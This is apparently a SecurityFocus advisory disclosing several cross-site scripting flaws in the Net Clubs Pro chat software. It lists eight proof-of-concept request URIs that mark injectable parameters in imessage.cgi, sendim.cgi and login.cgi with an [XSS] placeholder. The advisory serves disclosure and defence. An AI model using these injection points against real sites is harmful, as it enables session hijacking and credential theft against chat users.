Net Clubs Pro Multiple Cross-Site Scripting Vulnerabilities



These issues can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.example.com/cgi-bin/netclubs//vchat/scripts/imessage.cgi?toto=&to=&sentby=&fromuser=r0t&command=changefont&username=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=[XSS]

http://www.example.com/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=&to=[XSS]

http://www.example.com/cgi-bin/netclubs//login.cgi?username=r0t&password=[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus